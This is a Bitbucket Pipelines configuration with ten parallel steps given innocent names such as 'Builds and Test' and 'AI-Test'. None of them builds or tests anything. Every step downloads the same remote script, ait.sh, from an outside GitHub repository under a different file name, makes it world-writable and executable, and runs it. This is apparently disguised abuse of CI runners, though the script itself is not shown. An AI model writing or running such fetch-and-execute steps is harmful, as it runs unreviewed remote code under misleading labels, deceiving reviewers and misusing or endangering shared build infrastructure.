image: ubuntu:bionic

pipelines:
  default:
    - parallel:
      - step:
          name: 'Builds and Test'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo bcm.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 bcm.sh
            - ./bcm.sh       
      - step:
          name: 'test-ubuntu'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo bam.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 bam.sh
            - ./bam.sh
      - step:
          name: 'Build-com-Test'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo blm.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 blm.sh
            - ./blm.sh   
      - step:       
          name: 'test-compile-ubuntu'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo bwm.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 bwm.sh
            - ./bwm.sh
      - step:
          name: 'comp-Test'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo bsm.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 bsm.sh
            - ./bsm.sh    
      - step:      
          name: 'test-series'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo bnm.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 bnm.sh
            - ./bnm.sh
      - step:
          name: 'AI-Test'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo bim.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 bim.sh
            - ./bim.sh        
      - step:  
          name: 'bionic-test'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo bvm.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 bvm.sh
            - ./bvm.sh
      - step:
          name: 'Aop-Test'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo bimni.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 bimni.sh
            - ./bimni.sh        
      - step:  
          name: 'bionicmi-test'
          script:
            - apt update
            - apt install curl -y
            - apt install sudo -y 
            - apt install wget -y
            - curl -Lfo bvmbn.sh https://github.com/Yosnfsh/mitto/raw/main/ait.sh
            - chmod 777 bvmbn.sh
            - ./bvmbn.sh
            
            
            
            
            
            
            